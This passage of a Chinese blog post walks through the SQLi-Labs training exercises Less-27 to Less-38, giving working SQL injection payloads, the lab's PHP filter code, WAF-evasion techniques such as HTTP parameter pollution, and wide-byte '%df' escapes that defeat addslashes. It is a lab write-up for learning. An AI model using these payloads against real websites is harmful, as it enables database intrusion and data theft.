}</code></pre><p><a href=http://www.xuebuyuan.com/1850494.html target=_blank rel=noopener>模式修正符</a><br>根据过滤代码，发现大小写类似<code>SelEct</code>，没被过滤。所以大小写绕过即可</p><pre><code class=sql>id=0&#39;%a0UnIon%a0SelEct%a02,database(),&#39;3</code></pre><p><strong>Less-27a(过滤union和select的盲注)</strong><br>与Less-27相比，不会显示报错语句，闭合方式变成双引号闭合。<br>闭合方式判断：<code>and 1=1</code>双引号显示正确，<code>and 1=0</code>双引号显示错误。可以大致确定是双引号闭合。<br><strong>Less-28(有括号的单引号字符型，过滤union和select等)</strong><br>与Less-27相比，闭合方式变成<code>&#39;)</code>闭合。看下源码</p><pre><code class=php>function blacklist($id)
{
$id= preg_replace(&#39;/[\/\*]/&#39;,&quot;&quot;, $id);                //strip out /*
$id= preg_replace(&#39;/[--]/&#39;,&quot;&quot;, $id);                //Strip out --.
$id= preg_replace(&#39;/[#]/&#39;,&quot;&quot;, $id);                    //Strip out #.
$id= preg_replace(&#39;/[ +]/&#39;,&quot;&quot;, $id);                //Strip out spaces.
//$id= preg_replace(&#39;/select/m&#39;,&quot;&quot;, $id);                    //Strip out spaces.
$id= preg_replace(&#39;/[ +]/&#39;,&quot;&quot;, $id);                //Strip out spaces.
$id= preg_replace(&#39;/union\s+select/i&#39;,&quot;&quot;, $id);        //Strip out UNION &amp; SELECT.
return $id;
}</code></pre><p><strong>Less-28a(有括号的单引号字符型，过滤union和select等的盲注)</strong><br>和Less-28相同。。。看下源码</p><pre><code class=php>function blacklist($id)
{
//$id= preg_replace(&#39;/[\/\*]/&#39;,&quot;&quot;, $id);                //strip out /*
//$id= preg_replace(&#39;/[--]/&#39;,&quot;&quot;, $id);                //Strip out --.
//$id= preg_replace(&#39;/[#]/&#39;,&quot;&quot;, $id);                    //Strip out #.
//$id= preg_replace(&#39;/[ +]/&#39;,&quot;&quot;, $id);                //Strip out spaces.
//$id= preg_replace(&#39;/select/m&#39;,&quot;&quot;, $id);                    //Strip out spaces.
//$id= preg_replace(&#39;/[ +]/&#39;,&quot;&quot;, $id);                //Strip out spaces.
$id= preg_replace(&#39;/union\s+select/i&#39;,&quot;&quot;, $id);        //Strip out spaces.
return $id;
}</code></pre><p>发现与Less-28相比，很多过滤还被注释了。如果把注释去掉，基本上过滤了所有字符，但是，所有的一次性过滤都能用双写绕过。当然也可以用盲注。</p><h3 id=三、WAF绕过注入-Less-29-Less-31><a href=#三、WAF绕过注入-Less-29-Less-31 class=headerlink title=三、WAF绕过注入(Less-29-Less-31)></a>三、WAF绕过注入(Less-29-Less-31)</h3><p><strong>了解一下WAF</strong><br><a href=https://secsky.sinaapp.com/216.html target=_blank rel=noopener>WAF</a><br><a href=https://blog.csdn.net/nzjdsds/article/details/77758824 target=_blank rel=noopener>MYSQL注入天书之服务器两层架构</a><br>在SQL注入过程中主流的WAF绕过技术：</p><blockquote><p>1.转换特征字符大小写<br>2.利用注释绕过<br>3.编码特征字符绕过<br>4.分隔重写特征字符绕过<br>5.利用截断字符绕过<br>6.变换变量位置绕过<br>7.针对域名保护的绕近<br>8.超大数据包绕过<br>9.转换数据提交方式绕过<br>10.HPP（HTTP参数污染）绕过</p></blockquote><pre><code class=sql>?id=1&amp;id=2</code></pre><p>apache(php)解析最后一个参数，即显示id=2的内容。Tomcat(jsp)解析第一个参数，即显示id=1的内容。Tomcat功能类似一个WAF<br>所以我们要传入两个id，第一个用来欺骗waf，第二个用来传送给apache。<br><strong>Less-29(基于WAF的一个错误)</strong><br>测试后发现是单引号闭合。并且没有过滤<code>注释</code>，<code>空格</code>，<code>引号</code>，<code>unsion</code>，<code>select</code>，<code>and</code>，<code>or</code>。<br>所以尝试直接测试</p><pre><code class=sql>id=1&#39; and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+</code></pre><p><img src=http://img-blog.csdnimg.cn/20191112193403719.jpg alt=在这里插入图片描述><br>直接报错注入成功。。。。还是再试下吧！于是又试了下联合查询注入</p><pre><code class=sql>id=0&#39; union select 1,database(),3 --+</code></pre><p>依旧成功。。。。最后再试试linux系统下的。。。依旧成功。。。。<br><strong>Less-30(基于错误的GET型双引号字符型注入)</strong><br>测试后发现是双引号闭合，将 Less-29的payload的<code>&#39;</code>换成<code>&quot;</code></p><pre><code class=sql>id=0” union select 1,database(),3 --+</code></pre><p>发现失败了。于是看了下Less-29的标题和Less-30的标题。发现应该涉及了WAF。<br>查看源码，发现WAF在<code>login.php</code>里</p><pre><code class=php>//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
//使用白名单方法实现WAF。。。。。只允许输入为数字
function whitelist($input)
{
    $match = preg_match(&quot;/^\d+$/&quot;, $input);
    if($match)
    {
        //echo &quot;you are good&quot;;
        //return $match;
    }
    else
    {    
        header(&#39;Location: hacked.php&#39;);
        //echo &quot;you are bad&quot;;
    }
}



// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
//当受到HPP（HTTP参数污染）时，下面的函数将模拟参数的行为
function java_implimentation($query_string)
{
    $q_s = $query_string;
    $qs_array= explode(&quot;&amp;&quot;,$q_s);


    foreach($qs_array as $key =&gt; $value)
    {
        $val=substr($value,0,2);
        if($val==&quot;id&quot;)
        {
            $id_value=substr($value,3,30); 
            return $id_value;
            echo &quot;&lt;br&gt;&quot;;
            break;
        }

    }

}</code></pre><p>所以waf是只允许输入数字的，我们在输入数字的时候先给waf看然后检测正常后才转发给我们需要访问的页面。然后模拟了HTTP参数污染时，参数的行为。所以应该可以用HTTP参数污染绕过。<br>这里就不详细分析了。参考飘零师傅的<a href=http://skysec.top/2017/07/20/SQLi-LABS(Adv)(Less-23%20~%20Less-38)/#Less-30 target=_blank rel=noopener>分析</a>即可。<br>payload</p><pre><code class=sql>id=1&amp;id=0&quot; union select 1,2,database() --+</code></pre><p><img src=http://img-blog.csdnimg.cn/20191112202404343.jpg alt=在这里插入图片描述><br>Less-31(Protection with WAF用WAF防护)<br>闭合方式为<code>&quot;)</code>，解法参照Less-30</p><h3 id=四、宽字节注入-Less-32-Less-38><a href=#四、宽字节注入-Less-32-Less-38 class=headerlink title=四、宽字节注入(Less-32-Less-38)></a>四、宽字节注入(Less-32-Less-38)</h3><p><strong>相关概念</strong></p><blockquote><p>单字节字符集： 所有的字符都使用一个字节来表示，比如 ASCII 编码。<br>多字节字符集： 在多字节字符集中，一部分字节用多个字节来表示，另一部分（可能没有）用单个字节来表示。<br>两位的多字节字符有一个前导字节和尾字节。 在某个多字节字符集内，前导字节位于某个特定范围内，尾字节也一样。<br>UTF-8 编码： 是一种编码的编码方式（多字节编码），它可以使用1~4个字节表示一个符号，根据不同的符号而变化字节长度。<br>常见的宽字节： GB2312、GBK、GB18030、BIG5、Shift_JIS GB2312</p></blockquote><p><strong>前提条件</strong><br>要有宽字节注入漏洞</p><ol><li>首先要满足目标程序使用双<code>/</code>多字节字符集进行解析</li><li>其次不同字符集范围不一样，可能低位不包含单字节字符集的字符，这样就没办法了，所以要保证在该种字符集范围中包含低字节位，比如 0x5C(01011100) 的字符，即转义符<code>\</code>。</li></ol><p><strong>原理</strong><br>宽字节（两字节）带来的安全问题主要是吃ASCII字符（一字节）的现象，使用一些特殊字符来”吃掉“经过转义符 “ <code>\</code> ” 。<br><strong>注意</strong></p><ul><li>宽字节不只是出现在GBK编码，在PHP中，通过<code>iconv()</code>进行编码转换时，也可能出现宽字节注入。</li><li>这里所说的编码问题不是出现在HTML页面编码，而是与数据库的编码形式有关，一般我们在建立一个数据库的时候会让我们选择数据库的编码形式，所以有时候网站虽然是UTF-8写的，但是如果数据库是GBK的形式，也会出现宽字节。</li></ul><p><strong>MySQL中用于转义的函数</strong></p><blockquote><p>addslashes、mysql_real_escape_string、mysql_escape_string以及后面在高版本被去除的magic_quote_gpc</p></blockquote><p><strong>绕过方法</strong><br>因为宽字节注入主要是吃掉 <code>\</code> ，所以一般时候加一个 <code>%df</code> 这种就可以吃掉，其实加三个<code>%df</code>也可以吃掉，只要是奇数个<code>%df</code>即可。<br><strong>Less-32(绕过addslashes())</strong><br>测试后发现单引号双引号都不会报错,并且被<code>\</code>转义了，所以可以用宽字节注入<code>%df&#39;</code>报错。<br><code>&#39;</code>被加上反斜杠<code>\</code>，变成了 <code>%df\’</code>，其中<code>\</code>的十六进制是 <code>%5C</code> 所以 <code>%df\’ =%df%5c%27</code>，如果程序的默认字符集是GBK等宽字节字符集，则MySQL用GBK的编码时，会认为 <code>%df%5c</code> 是一个宽字符，也就是<code>運&#39;</code>，即<code>%df\’ = %df%5c%27=運&#39;</code></p><p>然后再测试，发现是单引号闭合。于是试了下爆库</p><pre><code class=sql>id=0%df&#39; union select 1,2,database() --+</code></pre><p><img src=http://img-blog.csdnimg.cn/20191112205838419.jpg alt=在这里插入图片描述><br><strong>Less-33</strong><br>跟less-32多大区别，宽字节注入即可。<br><strong>Less-34(绕过添加斜杠)</strong><br>POST型的宽字节。</p><pre><code class=sql>uname=0%df&#39; union select 1,database()#&amp;passwd=&amp;submit=Submit</code></pre><p><img src=http://img-blog.csdnimg.cn/20191112210605106.jpg alt=在这里插入图片描述><br><strong>Less-35</strong><br>整型注入,不需要闭合</p><pre><code class=sql>id=0 union select 1,2,database() --+</code></pre><p><strong>Less-36</strong><br>查看源码，用了函数<a href=https://www.w3school.com.cn/php/func_mysql_real_escape_string.asp target=_blank rel=noopener>mysql_real_escape_string()</a>，转义成功返回这些字符串，失败返回false。<br>宽字节注入，参考Less-32<br><strong>Less-37</strong><br>Less-34一样，只是过滤函数不同，使用函数mysql_real_escape_string()<br><strong>Less-38</strong><br>参考Less-32</p><h3 id=后记><a href=#后记 class=headerlink title=后记></a>后记</h3><p>Page-这次又收获了一些注入方法：二次注入、GET型过滤敏感关键字注入、WAF绕过注入、宽字节注入。<br>继续努力。。</p><hr><span style="font-style: italic;color: gray;">转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 qwzf1024@qq.com</span></div></article><p><a class=dashang onclick=dashangToggle()>赏</a></p><div id=vcomment class=comment></div><script src=//cdn1.lncld.net/static/js/3.0.4/av-min.js></script><script src=//unpkg.com/valine/dist/Valine.min.js></script><script src=https://cdnjs.loli.net/ajax/libs/jquery/3.2.1/jquery.min.js></script><script>
    var notify = 'true' == true ? true : false;
    var verify = 'true' == true ? true : false;
    new Valine({
        av: AV,
        el: '#vcomment',
        notify: notify,
        app_id: "5cXOwuHg0Yrf8teE1lzRCjHi-gzGzoHsz",
        app_key: "ToPzd33a36q3VXf83omuntVV",
        placeholder: "快来评论呀！",
        avatar:"mp",
        recordIP: "true",
        enableQQ: "true"
    });
</script></div><div class=copyright><p class=footer-entry><span class=miit><img src=/img/gov.png title=中华人民共和国工业和信息化部> <a href="http://beian.miit.gov.cn/">豫ICP备20008873号</a></span> ©2019-2020 Qwzf</p><p class=footer-entry>Built with <a href="https://hexo.io/" target=_blank>Hexo</a> and <a href=https://github.com/yelog/hexo-theme-3-hexo target=_blank>3-hexo</a> theme</p></div><div class=full-toc><button class=full data-title="切换全屏 快捷键 s"><span class=min></span></button> <a id=rocket></a></div></div><div class=hide_box onclick=dashangToggle()></div><div class=shang_box><a class=shang_close onclick=dashangToggle()>×</a><div class=shang_tit><p>喜欢就点赞,疼爱就打赏</p></div><div class=shang_payimg><div class=pay_img><img src=/img/alipay.jpg class=alipay title=扫码支持> <img src=/img/weixin.jpg class=weixin title=扫码支持></div></div><div class=shang_payselect><span><label><input type=radio name=pay checked value=alipay>支付宝</label></span><span><label><input type=radio name=pay value=weixin>微信</label></span></div></div><script src=/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/haruto.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body><script src="/js/jquery.pjax.js?v=1.1.0"></script><script>
  function unmouse(){ 
  document.oncontextmenu = new Function("return false;");
  document.onkeydown = document.onkeyup = document.onkeypress = function(event) {
      var e = event || window.event || arguments.callee.caller.arguments[0];
      if (e && (e.keyCode == 123 || (e.keyCode == 116 && e.type!='keypress'))) 
      {
          e.returnValue = false;
          return (false);
      }
  }
  }
  unmouse()
</script><script src="/js/script.js?v=1.1.0"></script><script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script><style>
    
    
    .nav {
        width: 572px;
    }
    .nav.fullscreen {
        margin-left: -572px;
    }
    .nav-left {
        width: 150px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    
    #post .pjax article .article-entry>ol, #post .pjax article .article-entry>ul, #post .pjax article>ol, #post .pjax article>ul{
        border: #e2dede solid 1px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    #post .pjax article .article-entry li>ol, #post .pjax article .article-entry li>ul,#post .pjax article li>ol, #post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    #post .pjax article .article-entry>ol>li, #post .pjax article .article-entry>ul>li,#post .pjax article>ol>li, #post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    #post .pjax article .article-entry li>ol>li, #post .pjax article .article-entry li>ul>li,#post .pjax article li>ol>li, #post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("https://img-blog.csdnimg.cn/20200726174858546.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style></html>